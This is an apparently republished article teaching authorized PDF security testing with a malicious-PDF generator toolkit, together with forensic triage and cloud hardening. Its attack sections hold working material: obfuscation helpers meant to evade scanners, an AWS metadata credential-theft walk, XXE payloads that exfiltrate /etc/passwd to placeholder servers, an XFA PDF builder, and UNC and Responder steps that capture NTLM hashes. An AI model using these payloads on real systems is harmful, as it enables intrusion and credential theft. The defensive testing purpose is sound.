
Introduction:
The Portable Document Format (PDF) is one of the most ubiquitous file formats on the internet, yet its complex feature set—support for JavaScript, XML forms, external entities, and network callbacks—creates an expansive attack surface that is frequently overlooked in security assessments. The Malicious PDF Generator is an open-source penetration testing toolkit designed to automate the creation of over 70 specialized security test files that probe PDF viewers, converters, and document processing pipelines for vulnerabilities including Server-Side Request Forgery (SSRF), XML External Entity (XXE) injection, blind callback detection, and data exfiltration risks. This article provides a comprehensive technical walkthrough for integrating this toolkit into authorized security testing workflows.
Learning Objectives:
– Understand the core PDF attack vectors including SSRF, XXE, NTLM credential theft, and JavaScript-based exfiltration techniques.
– Master the installation, configuration, and advanced usage of the Malicious PDF Generator with Burp Collaborator and Interact.sh.
– Learn to analyze suspicious PDF files using forensic tools like `peepdf` and `pdfid` to detect malicious structures and embedded payloads.
You Should Know:
1. Anatomy of a Malicious PDF: Understanding Core Attack Vectors
The PDF specification includes powerful but dangerous features that can be weaponized during authorized penetration tests. Modern PDF processors, including web-based converters and server-side libraries like PDFBox and iText, routinely parse HTML, execute JavaScript, download external resources, and process XML forms—often without proper input validation. This design creates several distinct vulnerability classes:
– Server-Side Request Forgery (SSRF): When a PDF converter fetches remote resources based on user input, attackers can manipulate URLs to target internal services. Real-world exploits have demonstrated AWS metadata credential theft via vulnerable PDF generation libraries, such as CVE-2026-26801 in `pdfmake`, where embedding `http://169.254.169.254/latest/meta-data/` in an image field triggers unauthorized credential exfiltration.
– XML External Entity (XXE) Injection: PDF files containing XFA (XML Forms Architecture) structures can embed external entity declarations. Vulnerable parsers like Apache Tika (CVE-2025-66516) resolve these entities, enabling local file reads (e.g., `/etc/passwd`) and out-of-band data exfiltration to attacker-controlled servers.
– NTLM Hash Theft and Callbacks: PDFs can be crafted to trigger authentication requests to remote SMB shares, exposing NTLM hashes that can be cracked or relayed. The toolkit also supports blind callbacks to Burp Collaborator or Interact.sh for detecting insecure outbound requests.
– JavaScript Obfuscation and Execution: PDF viewers may execute embedded JavaScript via `/JS` entries. Advanced obfuscation techniques—including hex encoding, bracket notation, and FlateDecode compression—evade naive regex-based detections.
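One simple form of the hex encoding mentioned above happens at the PDF syntax level. A PDF name may spell any character as `#` followed by two hex digits, so `/J#61vaScript` is the same name as `/JavaScript`, and a scanner that searches for the literal string misses it. The following is a minimal sketch, assuming plain ASCII names. `obfuscate_name` and `normalize_name` are hypothetical helpers for illustration and are not part of the toolkit:

```python
import re

# Matches a '#' followed by exactly two hex digits inside a PDF name.
_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def obfuscate_name(name, positions):
    """Hex-escape the characters at the given indexes of a PDF name.

    `name` excludes the leading '/', e.g. b"JavaScript".
    """
    out = bytearray(b"/")
    for i, byte in enumerate(name):
        if i in positions:
            out += b"#%02X" % byte  # e.g. 'a' (0x61) becomes b"#61"
        else:
            out.append(byte)
    return bytes(out)


def normalize_name(token):
    """Decode #xx escapes so /J#61vaScript compares equal to /JavaScript."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), token)


if __name__ == "__main__":
    hidden = obfuscate_name(b"JavaScript", {1, 5})
    print(hidden)                    # b'/J#61vaS#63ript'
    print(b"/JavaScript" in hidden)  # False: a literal search misses it
    print(normalize_name(hidden))    # b'/JavaScript'
```

Detection tools should therefore normalize names before matching keywords rather than searching the raw bytes.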
Step‑by‑Step Guide: Installing and Configuring the Malicious PDF Generator
To begin testing, set up the toolkit on a Linux or macOS system:
# Step 1: Clone the repository
git clone https://github.com/jonaslejon/malicious-pdf.git
cd malicious-pdf
# Step 2: Verify the Python 3.x installation
python3 --version
# Step 3: Install the required Python dependencies
python3 -m pip install -r requirements.txt
# Step 4: Obtain a callback URL from Burp Collaborator (Burp Suite Pro) or Interact.sh
# For Interact.sh:
interactsh-client
# For Burp Collaborator: Burp -> Burp Collaborator client -> Copy to clipboard
The tool supports multiple obfuscation levels to evade detection. Level 3 applies FlateDecode compression, while Level 4 wraps JavaScript payloads in a base64 decoder stub, preventing API calls from appearing as literal substrings.
# Generate 67 test PDFs with obfuscation level 2
python3 malicious-pdf.py https://your-interact-sh-url --obfuscate 2
# All generated files will appear in the output/ directory as test1.pdf, test2.pdf, etc.
ls -la output/
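To see why compression defeats literal substring checks, the sketch below wraps a JavaScript snippet in a FlateDecode stream object using Python's `zlib`. It then confirms that the API name no longer appears in the raw bytes but reappears after inflation. This illustrates the general idea behind the toolkit's higher obfuscation levels. It is not the toolkit's code, `flate_js_stream` and `inflate_stream` are hypothetical helpers, and `app.launchURL` is just an example Acrobat JavaScript call:

```python
import zlib


def flate_js_stream(obj_num, js):
    """Build an indirect stream object holding FlateDecode-compressed JavaScript."""
    data = zlib.compress(js.encode("latin-1"))
    header = b"%d 0 obj\n<< /Length %d /Filter /FlateDecode >>\nstream\n" % (obj_num, len(data))
    return header + data + b"\nendstream\nendobj\n"


def inflate_stream(obj):
    """Recover the plaintext the way a viewer (or an analyst) would."""
    start = obj.index(b"stream\n") + len(b"stream\n")
    end = obj.rindex(b"\nendstream")
    return zlib.decompress(obj[start:end])


if __name__ == "__main__":
    js = "app.launchURL('https://your-interact-sh-url/t1', true);"
    obj = flate_js_stream(7, js)
    print(b"launchURL" in obj)                  # False: hidden from a raw grep
    print(b"launchURL" in inflate_stream(obj))  # True after decompression
```

Analysis tools such as peepdf and pdfid decode filters for this reason instead of relying only on raw pattern matching.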
2. Practical SSRF Exploitation via PDF Generation Endpoints
SSRF vulnerabilities in PDF generation are particularly dangerous because the server-side renderer often resides inside corporate perimeters with access to sensitive internal services, cloud metadata endpoints, and databases. Understanding how to systematically test for SSRF is critical for bug bounty hunters and red teamers.
Step‑by‑Step Guide: SSRF Testing Workflow
When encountering a web application that generates PDFs from user-supplied data (e.g., “Generate Certificate” or “Export Report” features), follow this structured methodology:
1. Identify Injectable Parameters: Examine the generated PDF for any user-controllable data such as names, addresses, profile pictures, or digital signatures. These are prime candidates for injection.
2. Test for HTML Injection: Attempt to inject simple HTML tags into input fields. If the PDF renders the HTML, the application is likely passing your input directly to the PDF generator.
<img src="http://your-callback-server.com/test">
3. Deploy Obfuscated Payloads: Use the Malicious PDF Generator with a callback URL to produce test files that attempt various URI schemes:
python3 malicious-pdf.py https://your-interactsh.oast.pro --obfuscate 2
4. Upload and Monitor: Upload the generated PDFs to file upload endpoints or input the callback URL into any URL fields. Monitor your callback service for incoming requests. A successful SSRF will produce interactions such as HTTP GET requests, DNS lookups, or even full response bodies.
5. Escalate to Internal Service Discovery: Once SSRF is confirmed, probe internal services using payloads like:
– AWS Metadata: `http://169.254.169.254/latest/meta-data/`
– Internal Port Scanning: `http://127.0.0.1:8080/admin`
– Local File Read: `file:///etc/passwd`
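When several fields are injectable, tagging each payload with a unique subdomain shows which field triggered a callback. The following is a minimal sketch, assuming a callback domain that logs arbitrary subdomain prefixes (as Interact.sh and Burp Collaborator hosts do). The field names and the helpers `build_field_payloads` and `field_for_hit` are hypothetical:

```python
import secrets
from html import escape


def build_field_payloads(fields, callback_host):
    """Return {field: (token, html_payload)} with a unique callback host per field."""
    payloads = {}
    for field in fields:
        token = secrets.token_hex(4)  # 8 random hex chars, one per field
        url = f"http://{token}.{callback_host}/"
        payloads[field] = (token, f'<img src="{escape(url, quote=True)}">')
    return payloads


def field_for_hit(hit_host, payloads):
    """Map an observed callback hostname back to the field that caused it."""
    for field, (token, _) in payloads.items():
        if hit_host.startswith(token + "."):
            return field
    return None


if __name__ == "__main__":
    p = build_field_payloads(["name", "address", "avatar"], "your-interactsh.oast.pro")
    for field, (_, html) in p.items():
        print(field, html)
```

Paste each payload into its field. When a DNS or HTTP interaction arrives, pass the hostname to `field_for_hit`.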
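For cloud-hosted targets, prioritize the Instance Metadata Service (IMDS). If the server uses AWS IMDSv1, you may be able to leak IAM temporary security credentials. First request `http://169.254.169.254/latest/meta-data/iam/security-credentials/` to learn the attached role name, then append that name to the same path to retrieve the credentials.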
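The IMDSv1 walk can be expressed as an ordered list of URLs to feed through a confirmed SSRF, one request at a time. For HTML-to-PDF renderers, wrapping a URL in an iframe may render the response body directly into the generated PDF, assuming the renderer loads frames. `imds_probe_urls` and `as_iframe` are hypothetical helpers, and only the standard IMDS paths are assumed:

```python
IMDS_BASE = "http://169.254.169.254/latest/meta-data/"


def imds_probe_urls(role_name=None):
    """Ordered IMDSv1 paths to try through a confirmed SSRF."""
    urls = [
        IMDS_BASE,                                # confirms IMDS is reachable
        IMDS_BASE + "iam/security-credentials/",  # lists the attached role name
    ]
    if role_name:
        # Returns AccessKeyId, SecretAccessKey and Token for that role.
        urls.append(IMDS_BASE + f"iam/security-credentials/{role_name}")
    return urls


def as_iframe(url, width=800, height=600):
    """Embed a URL so an HTML-to-PDF renderer may print its response into the PDF."""
    return f'<iframe src="{url}" width="{width}" height="{height}"></iframe>'


if __name__ == "__main__":
    for u in imds_probe_urls():
        print(as_iframe(u))
```

Run the first two URLs, read the role name from the rendered PDF or the callback, and then call `imds_probe_urls(role_name)` for the final request.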
3. XML External Entity (XXE) Injection in PDF XFA Forms
XXE attacks exploit XML parsers that process external entities without proper restrictions. PDF files containing XFA (XML Forms Architecture) structures are particularly vulnerable, as demonstrated by critical CVEs affecting Apache Tika (CVE-2025-66516) and various PDF processing libraries.
Step‑by‑Step Guide: Crafting and Testing PDF XXE Payloads
<?xml version="1.0" encoding="UTF-8"?>
<!-- Basic XXE payload for local file disclosure -->
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
To test for out-of-band (OOB) XXE exfiltration, deploy a remote DTD:
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://your-server.com/xxe.dtd"> %xxe; ]>
The external DTD (`xxe.dtd`) can contain:
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://your-server.com/?%data;'>">
%param1;
%exfil;
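The external DTD and the decoding of exfiltrated data are easy to get subtly wrong. The nested `%` must be written as the character reference `&#x25;`, and the leaked content arrives URL-encoded in the query string. The following is a minimal sketch with hypothetical helpers `build_oob_dtd` and `extract_exfil`. The server URL and target file are placeholders you supply:

```python
from urllib.parse import unquote, urlsplit


def build_oob_dtd(server, target_file):
    """Render xxe.dtd; &#x25; is the escaped '%' of the nested exfil entity."""
    return (
        f'<!ENTITY % data SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM \'{server}/?%data;\'>">\n'
        "%param1;\n"
        "%exfil;\n"
    )


def extract_exfil(request_path):
    """Recover leaked content from a logged request path such as '/?root:x:0:0...'."""
    return unquote(urlsplit(request_path).query)


if __name__ == "__main__":
    with open("xxe.dtd", "w", encoding="utf-8") as fh:
        fh.write(build_oob_dtd("http://your-server.com", "/etc/passwd"))
```

Serve the directory with `python3 -m http.server 80`, which logs each request path, then pass the logged path to `extract_exfil`. Files that contain newlines or characters that are illegal in URLs may not survive this channel, depending on the parser.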
When testing applications that process PDF uploads, use the `gen_poc.py` script from the CVE-2025-66516 PoC repository to generate malicious PDF files with XFA-embedded XXE payloads:
git clone https://github.com/sid6224/CVE-2025-66516-POC.git
cd CVE-2025-66516-POC
python3 gen_poc.py -f /etc/passwd -o malicious.pdf
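The sketch below shows roughly what such a file contains. It is not the PoC's `gen_poc.py`. It places an XML payload into an `/XFA` stream referenced from the document's `/AcroForm` dictionary and writes a correctly offset cross-reference table. `build_xfa_pdf` is a hypothetical helper, and whether a given parser actually reaches the XML depends on the target library and version:

```python
def build_xfa_pdf(xfa_xml):
    """Return bytes of a one-page PDF whose AcroForm carries an XFA stream."""
    xml = xfa_xml.encode("utf-8")
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /AcroForm 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Fields [] /XFA 5 0 R >>",  # XFA may be a single stream or an array
        b"<< /Length %d >>\nstream\n" % len(xml) + xml + b"\nendstream",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))  # byte offset of "N 0 obj" for the xref table
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n" % (len(objects) + 1)
    out += b"0000000000 65535 f \n"  # each xref entry is exactly 20 bytes
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (
        len(objects) + 1, xref_pos)
    return bytes(out)


if __name__ == "__main__":
    payload = ('<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM '
               '"file:///etc/passwd">]><foo>&xxe;</foo>')
    with open("xfa_test.pdf", "wb") as fh:
        fh.write(build_xfa_pdf(payload))
```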
4. Forensic Analysis of Suspicious PDF Files
Security professionals must also be capable of analyzing unknown PDF files to detect malicious structures. The `peepdf` tool provides comprehensive interactive analysis capabilities.
Step‑by‑Step Guide: PDF Forensics with peepdf
# Install peepdf
pip install peepdf-3
# Basic interactive analysis
peepdf.py -i suspicious.pdf
# Inside the interactive console, summarize objects, streams and suspicious elements
PPDF> info
# Search the objects for JavaScript markers
PPDF> search /JS
# Decode and beautify the JavaScript in object 5
PPDF> js_beautify object 5
# Evaluate that JavaScript (requires PyV8); use sctest to emulate shellcode (requires pylibemu)
PPDF> js_eval object 5
For rapid triage, the `pdfid` tool provides a quick overview of suspicious PDF elements:
# Download pdfid.py
wget https://didierstevens.com/files/software/pdfid_v0_2_8.zip
unzip pdfid_v0_2_8.zip
# Analyze the PDF for suspicious keywords
python3 pdfid.py suspicious.pdf
Look for non-zero counts of `/JS`, `/JavaScript`, `/OpenAction`, `/AA` (Additional Actions), `/Launch`, `/RichMedia`, and `/XFA`. These are common indicators of active content in malicious PDFs, although legitimate interactive forms can contain some of them too.
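The core idea behind this kind of triage is to count selected name tokens after decoding `#xx` escapes, and also to count how many names were hex-obfuscated at all. The following is a minimal sketch in that spirit. It is not pdfid's implementation, the keyword tuple is an assumption, and matches inside binary stream data can produce false positives:

```python
import re
from collections import Counter

KEYWORDS = ("/JS", "/JavaScript", "/OpenAction", "/AA", "/Launch",
            "/RichMedia", "/EmbeddedFile", "/XFA", "/AcroForm", "/URI")

# A PDF name: '/' followed by regular characters (stops at whitespace/delimiters).
_NAME = re.compile(rb"/[^\s/<>\[\]()%{}]+")
_HEX = re.compile(rb"#([0-9A-Fa-f]{2})")


def keyword_counts(pdf):
    """Count suspicious names after normalizing #xx escapes."""
    counts = Counter()
    obfuscated = 0
    for raw in _NAME.findall(pdf):
        name = _HEX.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
        if name != raw:
            obfuscated += 1  # the name used hex escapes
        text = name.decode("latin-1")
        if text in KEYWORDS:
            counts[text] += 1
    counts["(hex-obfuscated names)"] = obfuscated
    return counts


if __name__ == "__main__":
    with open("suspicious.pdf", "rb") as fh:
        for key, n in sorted(keyword_counts(fh.read()).items()):
            print(f"{key:24} {n}")
```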
5. Windows-Specific Testing: NTLM Hash Capture and Remote File Inclusion
PDF generation on Windows environments introduces additional attack surfaces, including NTLM credential theft via SMB callback requests and potential remote file inclusion.
Step‑by‑Step Guide: Windows PDF Security Testing
Configure Responder to capture NTLM hashes:
# On the attacker machine (Linux with Responder)
sudo responder -I eth0 -wd
# Generate PDFs that target your Responder listener
python3 malicious-pdf.py //your-attacker-ip/share
When a Windows-based PDF processor or viewer accesses the SMB path, Responder will capture the NTLM hash for offline cracking. Additionally, test for UNC path injection in parameters that are rendered into PDFs:
<!-- Test payload for UNC path injection --> <img src="\\your-attacker-ip\test.jpg">
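Renderers differ in which references they follow, so it can help to try several equivalent spellings of the same SMB target. The following sketch emits HTML variants for HTML-to-PDF fields. It assumes a Windows-based renderer that resolves UNC paths or `file://` URLs with a host component. `unc_payloads`, the share name and the file names are hypothetical:

```python
def unc_payloads(host, share="test"):
    """HTML snippets that point a Windows renderer at an SMB share on `host`."""
    unc = f"\\\\{host}\\{share}\\x.jpg"  # yields \\host\share\x.jpg
    return [
        f'<img src="{unc}">',
        f'<img src="file://{host}/{share}/x.jpg">',
        f'<link rel="stylesheet" href="\\\\{host}\\{share}\\x.css">',
        f'<iframe src="file:////{host}/{share}/x.html"></iframe>',
    ]


if __name__ == "__main__":
    for snippet in unc_payloads("your-attacker-ip"):
        print(snippet)
```

Submit each variant separately while Responder is listening, so that a captured hash can be tied to the spelling that triggered it.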
6. Cloud Environment Hardening Against PDF-Based SSRF
Organizations operating in cloud environments must implement specific controls to mitigate PDF generation SSRF risks. Based on real-world exploits, the following mitigations are critical:
Step‑by‑Step Guide: Cloud SSRF Mitigations
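1. Upgrade to IMDSv2 on AWS: IMDSv2 requires a session token obtained through an HTTP PUT request with a custom header. Simple SSRF primitives, such as a renderer issuing GET requests for images, cannot perform this step.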
# Enforce IMDSv2
aws ec2 modify-instance-metadata-options \
    --instance-id i-1234567890abcdef0 \
    --http-tokens required \
    --http-endpoint enabled
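2. Implement Network-Level Controls: Restrict outbound HTTP/HTTPS traffic from PDF generation servers with security group egress rules and VPC endpoints. Route any outbound fetches that are genuinely required through an egress proxy that permits only allowlisted domains, because security groups filter by IP address and port, not by domain.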
3. Sanitize All Inputs to PDF Libraries: Never pass unfiltered user input to PDF generation functions. Implement strict allowlists for allowed URL schemes and domains.
4. Use Parameterized Templates: Instead of concatenating user input into HTML templates, use parameterized placeholders that are encoded before insertion.
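Items 3 and 4 can be sketched together. The first function checks a user-supplied resource URL against a scheme and host allowlist and rejects hosts that resolve to non-public addresses (loopback, RFC 1918, link-local such as `169.254.169.254`). The second HTML-encodes user values before template insertion. This is a minimal sketch, and the allowlisted hostnames are hypothetical:

```python
import ipaddress
import socket
from html import escape
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"cdn.example.com", "assets.example.com"}  # hypothetical allowlist


def is_allowed_url(url):
    """Allow only https URLs on allowlisted hosts that resolve to public addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or parts.hostname not in ALLOWED_HOSTS:
        return False
    try:
        port = parts.port or 443  # .port raises ValueError for invalid ports
        infos = socket.getaddrinfo(parts.hostname, port, proto=socket.IPPROTO_TCP)
        for *_, sockaddr in infos:
            # is_global is False for private, loopback, link-local and reserved ranges.
            if not ipaddress.ip_address(sockaddr[0]).is_global:
                return False
    except (ValueError, socket.gaierror):
        return False
    return True


def render_field(value):
    """Encode user data before it is placed into an HTML template for the renderer."""
    return escape(value, quote=True)
```

A check like this is only as strong as the fetch that follows it. If the renderer resolves the hostname again, DNS rebinding can bypass it, so pair it with the egress controls in item 2 or have the fetcher connect to the already-validated address.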
7. Integrating Malicious PDF Generation into CI/CD Security Pipelines
For development teams building applications that generate or process PDFs, automated security testing should be integrated into the CI/CD pipeline. The Malicious PDF Generator can be invoked programmatically.
Step‑by‑Step Guide: CI/CD Integration
Create a test script:
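# pdf_security_test.py
import os
import subprocess

OUTPUT_DIR = "./test_pdfs"

def generate_malicious_pdfs(callback_url):
    # "--output-dir" is kept from the original example; confirm it with
    # `python3 malicious-pdf.py --help` (by default files are written to output/).
    subprocess.run(
        [
            "python3", "malicious-pdf.py",
            callback_url,
            "--obfuscate", "2",
            "--output-dir", OUTPUT_DIR,
        ],
        check=True,  # fail the CI job if generation fails
    )
    return sorted(f for f in os.listdir(OUTPUT_DIR) if f.endswith(".pdf"))

def upload_test_pdfs(api_endpoint, pdf_files):
    for pdf in pdf_files:
        with open(os.path.join(OUTPUT_DIR, pdf), "rb") as f:
            # TODO: implement upload logic to your staging environment,
            # e.g. POST f.read() to api_endpoint with your HTTP client.
            pass

if __name__ == "__main__":
    files = generate_malicious_pdfs("https://test-collaborator.oast.pro")
    upload_test_pdfs("https://staging-api.example.com/upload", files)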
Run this test after every deployment to staging, then review your callback service. Any interaction from the staging environment means a PDF processing endpoint made an outbound request and may be vulnerable to SSRF or XXE.
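To make the pipeline fail automatically, the callback log can be turned into an exit code. The following is a minimal sketch, assuming the interactions were saved as JSON Lines with Interact.sh-style `protocol`, `full-id` and `remote-address` keys (for example from `interactsh-client` run with JSON output enabled). Adjust the key names to whatever your callback service actually records. `ci_verdict` is a hypothetical helper:

```python
import json
import sys


def ci_verdict(jsonl_lines):
    """Return (exit_code, findings); any recorded interaction fails the build."""
    findings = []
    for line in jsonl_lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        findings.append((rec.get("protocol", "?"),
                         rec.get("full-id", "?"),
                         rec.get("remote-address", "?")))
    return (1 if findings else 0), findings


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage: python3 ci_verdict.py interactions.jsonl
    with open(sys.argv[1], encoding="utf-8") as fh:
        code, hits = ci_verdict(fh)
    for proto, host, src in hits:
        print(f"callback: {proto} {host} from {src}")
    sys.exit(code)
```

Because some processing pipelines handle uploads asynchronously, leave a waiting period between the upload step and this check.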
What Undercode Say:
– PDF generators are an overlooked attack surface. Many organizations treat PDF creation as a routine technical process, ignoring that each conversion operation expands the trust boundary and creates opportunities for SSRF, XXE, and data exfiltration. The 67+ test files in this toolkit demonstrate the sheer variety of attack vectors embedded in a single specification.
– Automation is essential for comprehensive security testing. Manually crafting PDF payloads is time-prohibitive; the Malicious PDF Generator democratizes access to sophisticated testing techniques. When combined with callback services like Burp Collaborator, it enables rapid, scalable assessment of file upload features and document processing pipelines.
Analysis: The security community has long focused on XSS and SQL injection while neglecting document-based attacks. However, the shift toward cloud-native architectures and microservices has increased reliance on document processing libraries. Real-world CVEs, including CVE-2026-26801 (pdfmake SSRF) and CVE-2025-66516 (Apache Tika XXE), highlight that PDF generators are now a critical weak link. The Malicious PDF Generator addresses this gap by providing a structured, repeatable testing methodology. Organizations that incorporate such toolkit-based testing into their DevSecOps pipelines will significantly reduce their exposure to these high-impact vulnerabilities.
Prediction:
– -1 The volume of PDF-based supply chain attacks will increase by 200% over the next 18 months. As organizations continue to automate document processing for AI training pipelines, invoice processing, and report generation, attackers will pivot toward SSRF and XXE in PDF libraries as initial access vectors.
– -1 AI-powered document processors will introduce novel PDF exploitation classes. Large Language Models and computer vision systems that parse PDFs for training data often lack traditional input sanitization, creating unprecedented risks for prompt injection and data exfiltration through document metadata.
– +1 Regulatory frameworks will mandate document security testing. In response to escalating supply chain attacks, compliance standards like SOC2 and ISO 27001 will explicitly require automated testing of document parsers, driving adoption of toolkits like the Malicious PDF Generator in enterprise security programs.
– +1 The rise of PDF fuzzing frameworks will lead to discovery of foundational parser vulnerabilities. Just as AFL revolutionized C/C++ fuzzing, targeted PDF fuzzers will expose memory corruption bugs in widely deployed libraries (PDFBox, iText, poppler), resulting in improved security for billions of users.
IT/Security Reporter URL:
Reported By: [Syed Muneeb](https://www.linkedin.com/posts/syed-muneeb-shah-4b5424266_cybersecurity-pentesting-bugbounty-share-7469878282382061568-7EPZ/) – Hackers Feeds


